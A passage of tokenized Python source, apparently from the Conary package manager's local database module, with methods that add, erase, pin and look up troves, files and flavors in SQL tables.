( self ) : <EOL> if self . db and not self . db . closed : <EOL> self . db . close ( ) <EOL> del self . db <EOL> def begin ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . db . transaction ( ) <EOL> def rollback ( self ) : <EOL> self . needsCleanup = False <EOL> self . db . rollback ( ) <EOL> def iterAllTroveNames ( self ) : <EOL> return self . instances . iterNames ( ) <EOL> def iterFindByName ( self , name , pristine = False ) : <EOL> instanceIds = [ x [ <NUM_LIT:0> ] for x in self . instances . iterByName ( name ) ] <EOL> return self . _iterTroves ( instanceIds = instanceIds , pristine = pristine ) <EOL> def iterVersionByName ( self , name , withFlavors ) : <EOL> cu = self . db . cursor ( ) <EOL> if withFlavors : <EOL> flavorCol = "<STR_LIT>" <EOL> flavorClause = """<STR_LIT>""" <EOL> else : <EOL> flavorCol = "<STR_LIT>" <EOL> flavorClause = "<STR_LIT>" <EOL> cu . execute ( """<STR_LIT>""" <EOL> % ( flavorCol , flavorClause , name ) ) <EOL> flavors = { } <EOL> for ( match , timeStamps , flavorStr ) in cu : <EOL> ts = [ float ( x ) for x in timeStamps . split ( '<STR_LIT::>' ) ] <EOL> version = versions . VersionFromString ( match , timeStamps = ts ) <EOL> if withFlavors : <EOL> f = flavors . get ( flavorStr , None ) <EOL> if f is None : <EOL> f = deps . deps . ThawFlavor ( flavorStr ) <EOL> flavors [ flavorStr ] = f <EOL> yield ( version , f ) <EOL> else : <EOL> yield ( version ) <EOL> def getAllTroveFlavors ( self , troveDict ) : <EOL> outD = { } <EOL> cu = self . db . cursor ( ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> for name , versionList in troveDict . iteritems ( ) : <EOL> d = { } . fromkeys ( versionList ) <EOL> outD [ name ] = d <EOL> for key in d : <EOL> d [ key ] = [ ] <EOL> cu . execute ( """<STR_LIT>""" , name ) <EOL> for ( match , timeStamps , flavor ) in cu : <EOL> version = versionCache . get ( match , timeStamps ) <EOL> if outD [ name ] . has_key ( version ) : <EOL> outD [ name ] [ version ] . append ( flavorCache . get ( flavor ) ) <EOL> return outD <EOL> def iterAllTroves ( self , withPins = False ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> for ( troveName , version , timeStamps , flavor , pinned ) in cu : <EOL> version = versionCache . get ( version , timeStamps ) <EOL> flavor = flavorCache . get ( flavor ) <EOL> nvf = TroveTuple ( troveName , version , flavor ) <EOL> if withPins : <EOL> yield nvf , ( pinned != <NUM_LIT:0> ) <EOL> else : <EOL> yield nvf <EOL> def pinTroves ( self , name , version , flavor , pin = True ) : <EOL> if flavor is None or flavor . isEmpty ( ) : <EOL> flavorClause = "<STR_LIT>" <EOL> else : <EOL> flavorClause = "<STR_LIT>" % flavor . freeze ( ) <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % flavorClause , pin , name , version . asString ( ) ) <EOL> @ api . publicApi <EOL> def trovesArePinned ( self , troveList ) : <EOL> """<STR_LIT>""" <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> def _iter ( tl ) : <EOL> for name , version , flavor in troveList : <EOL> yield ( name , version . asString ( ) , flavor . freeze ( ) ) <EOL> cu . executemany ( "<STR_LIT>" , _iter ( troveList ) , <EOL> start_transaction = False ) <EOL> count = cu . execute ( '<STR_LIT>' ) . next ( ) [ <NUM_LIT:0> ] <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> results = [ x [ <NUM_LIT:0> ] == <NUM_LIT:1> for x in cu ] <EOL> assert ( len ( results ) == count ) <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> return results <EOL> def hasByName ( self , name ) : <EOL> return self . instances . hasName ( name ) <EOL> def getVersionId ( self , version , cache ) : <EOL> theId = cache . get ( version , None ) <EOL> if theId : <EOL> return theId <EOL> theId = self . versionTable . get ( version , None ) <EOL> if theId == None : <EOL> theId = self . versionTable . addId ( version ) <EOL> cache [ version ] = theId <EOL> return theId <EOL> def getInstanceId ( self , troveName , versionId , flavorId , <EOL> timeStamps , isPresent = True ) : <EOL> theId = self . instances . get ( ( troveName , versionId , flavorId ) , <EOL> None ) <EOL> if theId is None : <EOL> theId = self . instances . addId ( troveName , versionId , flavorId , <EOL> timeStamps , isPresent = isPresent ) <EOL> return theId <EOL> def _findTroveInstanceId ( self , cu , name , version , flavor ) : <EOL> if flavor . isEmpty ( ) : <EOL> flavorStr = "<STR_LIT>" <EOL> else : <EOL> flavorStr = "<STR_LIT>" % flavor . freeze ( ) <EOL> cu . execute ( """<STR_LIT>""" % flavorStr , name , str ( version ) ) <EOL> rows = list ( cu ) <EOL> if not len ( rows ) : <EOL> raise errors . TroveNotFound <EOL> return rows [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> def addTrove ( self , trove , pin = False , oldTroveSpec = None ) : <EOL> cu = self . db . cursor ( ) <EOL> troveName = trove . getName ( ) <EOL> troveVersion = trove . getVersion ( ) <EOL> troveVersionId = self . getVersionId ( troveVersion , { } ) <EOL> self . addVersionCache [ troveVersion ] = troveVersionId <EOL> if oldTroveSpec is not None : <EOL> oldTroveId = self . _findTroveInstanceId ( cu , * oldTroveSpec ) <EOL> else : <EOL> oldTroveId = None <EOL> troveFlavor = trove . getFlavor ( ) <EOL> if not troveFlavor . isEmpty ( ) : <EOL> self . flavorsNeeded [ troveFlavor ] = True <EOL> for ( name , version , flavor ) in trove . iterTroveList ( strongRefs = True , <EOL> weakRefs = True ) : <EOL> if not flavor . isEmpty ( ) : <EOL> self . flavorsNeeded [ flavor ] = True <EOL> if self . flavorsNeeded : <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords ) <EOL> for flavor in self . flavorsNeeded . keys ( ) : <EOL> cu . execute ( "<STR_LIT>" , <EOL> None , flavor . freeze ( ) ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> self . flavorsNeeded = { } <EOL> flavors = { } <EOL> if not troveFlavor . isEmpty ( ) : <EOL> flavors [ troveFlavor ] = True <EOL> for ( name , version , flavor ) in trove . iterTroveList ( strongRefs = True , <EOL> weakRefs = True ) : <EOL> if not flavor . isEmpty ( ) : <EOL> flavors [ flavor ] = True <EOL> flavorMap = self . flavors . getItemDict ( flavors . iterkeys ( ) ) <EOL> del flavors <EOL> if troveFlavor . isEmpty ( ) : <EOL> troveFlavorId = <NUM_LIT:0> <EOL> else : <EOL> troveFlavorId = flavorMap [ troveFlavor . freeze ( ) ] <EOL> troveInstanceId = self . instances . get ( ( troveName , troveVersionId , <EOL> troveFlavorId ) , None , justPresent = False ) <EOL> if troveInstanceId : <EOL> self . instances . setPresent ( troveInstanceId , <NUM_LIT:1> , pinned = pin ) <EOL> else : <EOL> assert ( min ( troveVersion . timeStamps ( ) ) > <NUM_LIT:0> ) <EOL> troveInstanceId = self . instances . addId ( troveName , troveVersionId , <EOL> troveFlavorId , troveVersion . timeStamps ( ) , <EOL> pinned = pin ) <EOL> assert ( cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , troveInstanceId ) . next ( ) [ <NUM_LIT:0> ] == <NUM_LIT:0> ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords ) <EOL> def _iter ( trove ) : <EOL> for ( name , version , flavor ) , byDefault , isStrong in trove . iterTroveListInfo ( ) : <EOL> versionId = self . getVersionId ( version , self . addVersionCache ) <EOL> if flavor . isEmpty ( ) : <EOL> flavorId = <NUM_LIT:0> <EOL> else : <EOL> flavorId = flavorMap [ flavor . freeze ( ) ] <EOL> flags = <NUM_LIT:0> <EOL> if not isStrong : <EOL> flags |= schema . TROVE_TROVES_WEAKREF <EOL> if byDefault : <EOL> flags |= schema . TROVE_TROVES_BYDEFAULT ; <EOL> yield ( name , versionId , flavorId , <EOL> "<STR_LIT::>" . join ( [ "<STR_LIT>" % x for x in version . timeStamps ( ) ] ) , <EOL> flags ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> _iter ( trove ) ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . execute ( """<STR_LIT>""" , troveInstanceId , True ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> trove . troveInfo . installTime . set ( time . time ( ) ) <EOL> self . depTables . add ( cu , trove , troveInstanceId ) <EOL> self . troveInfoTable . addInfo ( cu , trove , troveInstanceId ) <EOL> cu . execute ( '''<STR_LIT>''' , trove . getName ( ) ) <EOL> collections = cu . fetchall ( ) <EOL> cu . execute ( "<STR_LIT>" , troveInstanceId ) <EOL> collections += cu . fetchall ( ) <EOL> for x , in collections : <EOL> self . _sanitizeTroveCollection ( cu , x , nameHint = trove . getName ( ) ) <EOL> self . _sanitizeTroveCollection ( cu , troveInstanceId ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords ) <EOL> stmt = cu . compile ( """<STR_LIT>""" ) <EOL> return ( cu , troveInstanceId , stmt , oldTroveId ) <EOL> def _sanitizeTroveCollection ( self , cu , instanceId , nameHint = None ) : <EOL> if nameHint : <EOL> nameClause = "<STR_LIT>" % nameHint <EOL> else : <EOL> nameClause = "<STR_LIT>" <EOL> cu . execute ( """<STR_LIT>""" % nameClause , instanceId ) <EOL> pristineTrv = trove . Trove ( '<STR_LIT:foo>' , versions . NewVersion ( ) , <EOL> deps . deps . Flavor ( ) , None ) <EOL> currentTrv = trove . Trove ( '<STR_LIT:foo>' , versions . NewVersion ( ) , <EOL> deps . deps . Flavor ( ) , None ) <EOL> instanceDict = { } <EOL> origIncluded = set ( ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> for ( includedId , name , version , flavor , isPresent , <EOL> inPristine , timeStamps ) in cu : <EOL> flavor = flavorCache . get ( flavor ) <EOL> version = versionCache . get ( version , timeStamps ) <EOL> instanceDict [ ( name , version , flavor ) ] = includedId <EOL> origIncluded . add ( ( name , version , flavor ) ) <EOL> if isPresent : <EOL> currentTrv . addTrove ( name , version , flavor ) <EOL> if inPristine : <EOL> pristineTrv . addTrove ( name , version , flavor ) <EOL> linkByName = { } <EOL> trvChanges = currentTrv . diff ( pristineTrv ) [ <NUM_LIT:2> ] <EOL> for ( name , ( oldVersion , oldFlavor ) , ( newVersion , newFlavor ) , isAbs ) in trvChanges : <EOL> if oldVersion is None : <EOL> badInstanceId = instanceDict [ ( name , newVersion , newFlavor ) ] <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , instanceId , badInstanceId ) <EOL> origIncluded . discard ( ( name , newVersion , newFlavor ) ) <EOL> elif newVersion is None : <EOL> linkByName . setdefault ( name , set ( ) ) . add ( oldVersion . branch ( ) ) <EOL> if not linkByName : return <EOL> for ( name , version , flavor ) in self . findByNames ( linkByName ) : <EOL> if version . branch ( ) in linkByName [ name ] : <EOL> currentTrv . addTrove ( name , version , flavor , presentOkay = True ) <EOL> trvChanges = currentTrv . diff ( pristineTrv ) [ <NUM_LIT:2> ] <EOL> for ( name , ( oldVersion , oldFlavor ) , ( newVersion , newFlavor ) , isAbs ) in trvChanges : <EOL> if newVersion is None : continue <EOL> if ( name , newVersion , newFlavor ) in origIncluded : continue <EOL> if ( name , oldVersion , oldFlavor ) not in instanceDict : continue <EOL> oldIncludedId = instanceDict [ name , oldVersion , oldFlavor ] <EOL> flags = cu . execute ( """<STR_LIT>""" , <EOL> instanceId , oldIncludedId ) . next ( ) [ <NUM_LIT:0> ] <EOL> if newFlavor . isEmpty ( ) : <EOL> flavorStr = "<STR_LIT>" <EOL> else : <EOL> flavorStr = "<STR_LIT>" % newFlavor . freeze ( ) <EOL> cu . execute ( """<STR_LIT>""" % flavorStr , instanceId , flags , name , <EOL> newVersion . asString ( ) ) <EOL> def addFile ( self , troveInfo , pathId , path , fileId , fileVersion , <EOL> fileStream = None , isPresent = True ) : <EOL> ( cu , troveInstanceId , addFileStmt , oldInstanceId ) = troveInfo <EOL> versionId = self . getVersionId ( fileVersion , self . addVersionCache ) <EOL> if fileStream : <EOL> cu . execstmt ( addFileStmt , pathId , versionId , path , fileId , <EOL> fileStream , isPresent ) <EOL> tags = files . frozenFileTags ( fileStream ) <EOL> if tags : <EOL> cu . executemany ( "<STR_LIT>" , <EOL> itertools . izip ( itertools . repeat ( pathId ) , tags ) ) <EOL> else : <EOL> cu . execute ( """<STR_LIT>""" , <EOL> troveInstanceId , isPresent , path , versionId , <EOL> pathId , oldInstanceId ) <EOL> def addTroveDone ( self , troveInfo ) : <EOL> ( cu , troveInstanceId , addFileStmt , oldInstanceId ) = troveInfo <EOL> cu . execute ( """<STR_LIT>""" <EOL> % troveInstanceId ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . execute ( """<STR_LIT>""" , troveInstanceId ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> return troveInstanceId <EOL> def markUserReplacedFiles ( self , userReplaced ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> for ( name , version , flavor ) , fileList in userReplaced . iteritems ( ) : <EOL> for pathId , content , fileObj in fileList : <EOL> flavorStr = flavor . freeze ( ) <EOL> if not flavorStr : <EOL> flavorStr = None <EOL> cu . execute ( """<STR_LIT>""" , name , version . asString ( ) , flavorStr , pathId ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> def checkPathConflicts ( self , instanceIdList , replaceCheck , sharedFiles ) : <EOL> cu = self . db . cursor ( ) <EOL> cu2 = self . db . cursor ( ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> for instanceId in instanceIdList : <EOL> cu . execute ( "<STR_LIT>" , <EOL> instanceId ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> conflicts = [ ] <EOL> replaced = { } <EOL> for ( path , existingInstanceId , existingPathId , existingStream , <EOL> existingTroveName , existingVersion , existingFlavor , <EOL> addedInstanceId , addedPathId , addedStream , addedTroveName , <EOL> addedVersion , addedFlavor ) in cu : <EOL> if existingPathId in sharedFiles . get ( <EOL> ( existingTroveName , <EOL> versions . VersionFromString ( existingVersion ) , <EOL> deps . deps . ThawDependencySet ( existingFlavor ) ) , set ( ) ) : <EOL> continue <EOL> replaceExisting = False <EOL> addedFile = files . ThawFile ( addedStream , addedPathId ) <EOL> existingFile = files . ThawFile ( existingStream , existingPathId ) <EOL> if addedFile . compatibleWith ( existingFile ) : <EOL> continue <EOL> if ( addedFile . flags . isEncapsulatedContent ( ) and <EOL> existingFile . flags . isEncapsulatedContent ( ) ) : <EOL> cmp = files . rpmFileColorCmp ( addedFile , existingFile ) <EOL> if cmp == <NUM_LIT:1> : <EOL> replaceExisting = True <EOL> elif cmp == - <NUM_LIT:1> : <EOL> continue <EOL> if path . startswith ( '<STR_LIT>' ) : <EOL> continue <EOL> if replaceCheck ( path ) : <EOL> replaceExisting = True <EOL> if replaceExisting : <EOL> cu2 . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> existingInstanceId , existingPathId ) <EOL> existingTroveInfo = ( existingTroveName , <EOL> versions . VersionFromString ( existingVersion ) , <EOL> deps . deps . ThawFlavor ( existingFlavor ) ) <EOL> l = replaced . setdefault ( existingTroveInfo , [ ] ) <EOL> l . append ( ( existingPathId , None , None ) ) <EOL> else : <EOL> conflicts . append ( ( path , <EOL> ( existingPathId , <EOL> ( existingTroveName , <EOL> versions . VersionFromString ( existingVersion ) , <EOL> deps . deps . ThawFlavor ( existingFlavor ) ) ) , <EOL> ( addedPathId , <EOL> ( addedTroveName , <EOL> versions . VersionFromString ( addedVersion ) , <EOL> deps . deps . ThawFlavor ( addedFlavor ) ) ) ) ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> if conflicts : <EOL> raise errors . DatabasePathConflicts ( conflicts ) <EOL> return replaced <EOL> def getFile ( self , pathId , fileId , pristine = False ) : <EOL> stream = self . troveFiles . getFileByFileId ( fileId , <EOL> justPresent = not pristine ) [ <NUM_LIT:1> ] <EOL> return files . ThawFile ( stream , pathId ) <EOL> def getFileStream ( self , fileId , pristine = False ) : <EOL> return self . troveFiles . getFileByFileId ( fileId , <EOL> justPresent = not pristine ) [ <NUM_LIT:1> ] <EOL> def findFileVersion ( self , fileId ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" , fileId ) <EOL> for ( stream , ) in cu : <EOL> return files . ThawFile ( stream , None ) <EOL> return None <EOL> def iterFiles ( self , l ) : <EOL> cu = self . db . cursor ( ) <EOL> schema . resetTable ( cu , '<STR_LIT>' ) <EOL> cu . executemany ( '<STR_LIT>' , <EOL> ( ( x [ <NUM_LIT:0> ] , x [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) for x in enumerate ( l ) ) , <EOL> start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> l2 = [ None ] * len ( l ) <EOL> for ( row , stream ) in cu : <EOL> fObj = files . ThawFile ( stream , l [ row ] [ <NUM_LIT:0> ] ) <EOL> assert ( l [ row ] [ <NUM_LIT:1> ] == fObj . fileId ( ) ) <EOL> l2 [ row ] = fObj <EOL> return l2 <EOL> def hasTroves ( self , troveList ) : <EOL> instances = self . _lookupTroves ( troveList ) <EOL> result = [ False ] * len ( troveList ) <EOL> for i , instanceId in enumerate ( instances ) : <EOL> if instanceId is not None : <EOL> result [ i ] = True <EOL> return result <EOL> def getTroves ( self , troveList , pristine = True , withFiles = True , <EOL> withDeps = True , withFileObjects = False ) : <EOL> instances = self . _lookupTroves ( troveList ) <EOL> toFind = { } <EOL> for i , instanceId in enumerate ( instances ) : <EOL> if instanceId is not None : <EOL> toFind . setdefault ( instanceId , [ ] ) . append ( i ) <EOL> results = [ None for x in instances ] <EOL> instances = list ( self . _iterTroves ( pristine , <EOL> instanceIds = toFind , <EOL> withFiles = withFiles , <EOL> withDeps = withDeps , <EOL> withFileObjects = withFileObjects ) ) <EOL> for instanceId , instance in itertools . izip ( toFind , instances ) : <EOL> for slot in toFind [ instanceId ] : <EOL> results [ slot ] = instance <EOL> return results <EOL> def getTroveFiles ( self , troveList , onlyDirectories = False ) : <EOL> instanceIds = self . _lookupTroves ( troveList ) <EOL> if None in instanceIds : <EOL> raise KeyError <EOL> trvByInstanceId = dict ( [ ( instId , trvInfo ) for <EOL> instId , trvInfo in itertools . izip ( instanceIds , troveList ) <EOL> if instId is not None ] ) <EOL> instanceIds = trvByInstanceId . keys ( ) <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> list ( enumerate ( instanceIds ) ) , start_transaction = False ) <EOL> if onlyDirectories : <EOL> dirClause = "<STR_LIT>" <EOL> else : <EOL> dirClause = "<STR_LIT>" <EOL> cu . execute ( """<STR_LIT>""" % dirClause ) <EOL> lastId = None <EOL> for instanceId , path , stream in cu : <EOL> yield trvByInstanceId [ instanceId ] , path , stream <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> def _lookupTroves ( self , troveList ) : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> def _iter ( tl ) : <EOL> for i , ( name , version , flavor ) in enumerate ( tl ) : <EOL> yield ( i , name , str ( version ) , flavor . freeze ( ) ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> _iter ( troveList ) , <EOL> start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> r = [ None ] * len ( troveList ) <EOL> for ( idx , instanceId ) in cu : <EOL> r [ idx ] = instanceId <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> return r <EOL> def _iterTroves ( self , pristine , instanceIds , withFiles = True , <EOL> withDeps = True , errorOnMissing = True , <EOL> withFileObjects = False ) : <EOL> """<STR_LIT>""" <EOL> instanceIds = list ( instanceIds ) <EOL> if withFileObjects : <EOL> troveClass = trove . TroveWithFileObjects <EOL> else : <EOL> troveClass = trove . Trove <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> cu . executemany ( "<STR_LIT>" , <EOL> list ( enumerate ( instanceIds ) ) , start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> versionCache = VersionCache ( ) <EOL> flavorCache = FlavorCache ( ) <EOL> results = [ None for x in instanceIds ] <EOL> for idx , troveName , versionStr , flavorStr , timeStamps in cu : <EOL> troveFlavor = flavorCache . get ( flavorStr ) <EOL> troveVersion = versionCache . get ( versionStr , timeStamps ) <EOL> trv = troveClass ( troveName , troveVersion , troveFlavor , None , <EOL> setVersion = False ) <EOL> results [ idx ] = trv <EOL> cu = self . db . cursor ( ) <EOL> if pristine : <EOL> pristineClause = "<STR_LIT>" <EOL> else : <EOL> pristineClause = "<STR_LIT>" <EOL> cu . execute ( """<STR_LIT>""" % pristineClause ) <EOL> for idx , name , versionStr , flags , timeStamps , flavorStr in cu : <EOL> version = versionCache . get ( versionStr , timeStamps ) <EOL> flavor = flavorCache . get ( flavorStr ) <EOL> byDefault = ( flags & schema . TROVE_TROVES_BYDEFAULT ) != <NUM_LIT:0> <EOL> weakRef = ( flags & schema . TROVE_TROVES_WEAKREF ) != <NUM_LIT:0> <EOL> results [ idx ] . addTrove ( name , version , flavor , byDefault = byDefault , <EOL> weakRef = weakRef ) <EOL> for idx , instanceId in enumerate ( instanceIds ) : <EOL> trv = results [ idx ] <EOL> if withDeps : <EOL> self . depTables . get ( cu , trv , instanceId ) <EOL> self . troveInfoTable . getInfo ( cu , trv , instanceId ) <EOL> if not withFiles : <EOL> yield trv <EOL> if not pristine or withFiles : <EOL> if withFileObjects : <EOL> streamStr = "<STR_LIT>" <EOL> else : <EOL> streamStr = "<STR_LIT>" <EOL> cu . execute ( """<STR_LIT>""" % streamStr ) <EOL> curIdx = <NUM_LIT:0> <EOL> for ( idx , pathId , path , version , fileId , isPresent , stream ) in cu : <EOL> if not pristine and not isPresent : <EOL> continue <EOL> version = versions . VersionFromString ( version ) <EOL> results [ idx ] . addFile ( pathId , path , version , fileId ) <EOL> if stream : <EOL> results [ idx ] . addFileObject ( fileId , <EOL> files . ThawFile ( stream , pathId ) ) <EOL> while idx != curIdx : <EOL> yield results [ curIdx ] <EOL> curIdx += <NUM_LIT:1> <EOL> while curIdx < len ( results ) : <EOL> if not pristine : <EOL> results [ idx ] . computePathHashes ( ) <EOL> if not withFiles : <EOL> results [ idx ] . removeAllFiles ( ) <EOL> yield results [ curIdx ] <EOL> curIdx += <NUM_LIT:1> <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> def eraseTrove ( self , troveName , troveVersion , troveFlavor ) : <EOL> cu = self . db . cursor ( ) <EOL> if not self . needsCleanup : <EOL> self . needsCleanup = True <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" % self . db . keywords ) <EOL> troveVersionId = self . versionTable [ troveVersion ] <EOL> if troveFlavor is None : <EOL> troveFlavorId = <NUM_LIT:0> <EOL> else : <EOL> troveFlavorId = self . flavors [ troveFlavor ] <EOL> troveInstanceId = self . instances [ ( troveName , troveVersionId , <EOL> troveFlavorId ) ] <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , troveVersionId ) <EOL> cu . execute ( """<STR_LIT>""" , troveInstanceId ) <EOL> cu . execute ( """<STR_LIT>""" , troveInstanceId ) <EOL> wasIn = [ x for x in cu . execute ( "<STR_LIT>" , troveName ) ] <EOL> self . troveFiles . delInstance ( troveInstanceId ) <EOL> cu . execute ( "<STR_LIT>" , <EOL> troveInstanceId ) <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" , troveInstanceId ) <EOL> self . depTables . delete ( self . db . cursor ( ) , troveInstanceId ) <EOL> self . instances . setPresent ( troveInstanceId , <NUM_LIT:0> , False ) <EOL> for x , in wasIn : <EOL> self . _sanitizeTroveCollection ( cu , x , nameHint = troveName ) <EOL> def commit ( self ) : <EOL> if self . needsCleanup : <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> cu . execute ( "<STR_LIT>" ) <EOL> self . needsCleanup = False <EOL> self . db . commit ( ) <EOL> self . addVersionCache = { } <EOL> self . flavorsNeeded = { } <EOL> def dependencyChecker ( self , troveSource , findOrdering = True , <EOL> ignoreDepClasses = set ( ) ) : <EOL> return deptable . DependencyChecker ( self . db , troveSource , <EOL> findOrdering = findOrdering , <EOL> ignoreDepClasses = ignoreDepClasses ) <EOL> def pathIsOwned ( self , path ) : <EOL> for instanceId in self . troveFiles . iterPath ( path ) : <EOL> if self . instances . idIsPresent ( instanceId ) : <EOL> return True <EOL> return False <EOL> def iterFindByPath ( self , path , pristine = False ) : <EOL> return self . _iterTroves ( instanceIds = self . troveFiles . iterPath ( path ) , <EOL> pristine = pristine ) <EOL> def pathsOwned ( self , pathList ) : <EOL> if not pathList : <EOL> return [ ] <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords , start_transaction = False ) <EOL> self . db . bulkload ( "<STR_LIT>" , [ ( x , ) for x in pathList ] , [ "<STR_LIT:path>" ] , <EOL> start_transaction = False ) <EOL> cu . execute ( """<STR_LIT>""" ) <EOL> pathsFound = set ( x [ <NUM_LIT:0> ] for x in cu ) <EOL> cu . execute ( "<STR_LIT>" , start_transaction = False ) <EOL> return [ path in pathsFound for path in pathList ] <EOL> def iterFindPathReferences ( self , path , justPresent = False , <EOL> withStream = False ) : <EOL> if withStream : <EOL> stream = "<STR_LIT>" <EOL> else : <EOL> stream = "<STR_LIT>" <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % stream , path ) <EOL> for ( name , version , flavor , pathId , fileId , isPresent , stream ) in cu : <EOL> if not isPresent and justPresent : <EOL> continue <EOL> version = versions . VersionFromString ( version ) <EOL> if flavor is None : <EOL> flavor = deps . deps . Flavor ( ) <EOL> else : <EOL> flavor = deps . deps . ThawFlavor ( flavor ) <EOL> if stream : <EOL> yield ( name , version , flavor , pathId , fileId , stream ) <EOL> else : <EOL> yield ( name , version , flavor , pathId , fileId ) <EOL> def removeFileFromTrove ( self , trove , path ) : <EOL> versionId = self . versionTable [ trove . getVersion ( ) ] <EOL> flavorId = self . flavors [ trove . getFlavor ( ) ] <EOL> instanceId = self . instances [ ( trove . getName ( ) , versionId , flavorId ) ] <EOL> self . troveFiles . removePath ( instanceId , path ) <EOL> def removePathIdsFromTrove ( self , troveName , troveVersion , troveFlavor , <EOL> pathIdList ) : <EOL> versionId = self . versionTable [ troveVersion ] <EOL> flavorId = self . flavors [ troveFlavor ] <EOL> instanceId = self . instances [ ( troveName , versionId , flavorId ) ] <EOL> self . troveFiles . removePathIds ( instanceId , pathIdList ) <EOL> def restorePathIdsToTrove ( self , troveName , troveVersion , troveFlavor , <EOL> pathIdList ) : <EOL> versionId = self . versionTable [ troveVersion ] <EOL> flavorId = self . flavors [ troveFlavor ] <EOL> instanceId = self . instances [ ( troveName , versionId , flavorId ) ] <EOL> self . troveFiles . restorePathIds ( instanceId , pathIdList ) <EOL> def iterFilesInTrove ( self , troveName , version , flavor , <EOL> sortByPath = False , withFiles = False , <EOL> pristine = False ) : <EOL> if sortByPath : <EOL> sort = "<STR_LIT>" <EOL> else : <EOL> sort = "<STR_LIT>" <EOL> cu = self . db . cursor ( ) <EOL> troveVersionId = self . versionTable [ version ] <EOL> if flavor . isEmpty ( ) : <EOL> troveFlavorId = <NUM_LIT:0> <EOL> else : <EOL> troveFlavorId = self . flavors [ flavor ] <EOL> troveInstanceId = self . instances [ ( troveName , troveVersionId , <EOL> troveFlavorId ) ] <EOL> versionCache = { } <EOL> if pristine : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT:%s>" % sort , troveInstanceId ) <EOL> else : <EOL> cu . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % sort , troveInstanceId ) <EOL> versionCache = { } <EOL> for ( pathId , path , fileId , versionId , stream ) in cu : <EOL> version = versionCache . get ( versionId , None ) <EOL> if not version : <EOL> version = self . versionTable . getBareId ( versionId ) <EOL> versionCache [ versionId ] = version <EOL> if withFiles : <EOL> fileObj = files . ThawFile ( stream , pathId ) <EOL> yield ( pathId , path , fileId , version , fileObj ) <EOL> else : <EOL> yield ( pathId , path , fileId , version ) <EOL> def mapPinnedTroves ( self , mapList ) : <EOL> if not mapList : <EOL> return <EOL> cu = self . db . cursor ( ) <EOL> cu . execute ( """<STR_LIT>""" % self . db . keywords ) <EOL> def _iter ( ml ) : <EOL> for ( name , pinnedInfo , mapInfo ) in ml : <EOL> assert ( sum ( mapInfo [ <NUM_LIT:0> ] . timeStamps ( ) ) > <NUM_LIT:0> ) <EOL> if pinnedInfo [ <NUM_LIT:1> ] is None or pinnedInfo [ <NUM_LIT:1> ] . isEmpty ( ) : <EOL> pinnedFlavor = None <EOL> else : <EOL> pinnedFlavor = pinnedInfo [ <NUM_LIT:1> ] . freeze ( ) <EOL> if mapInfo [ <NUM_LIT:1> ] is None or mapInfo [ <NUM_LIT:1> ] . isEmpty ( ) : <EOL> mapFlavor = None <EOL> else : <EOL> mapFlavor = mapInfo [ <NUM_LIT:1> ] . freeze ( ) <EOL> yield ( 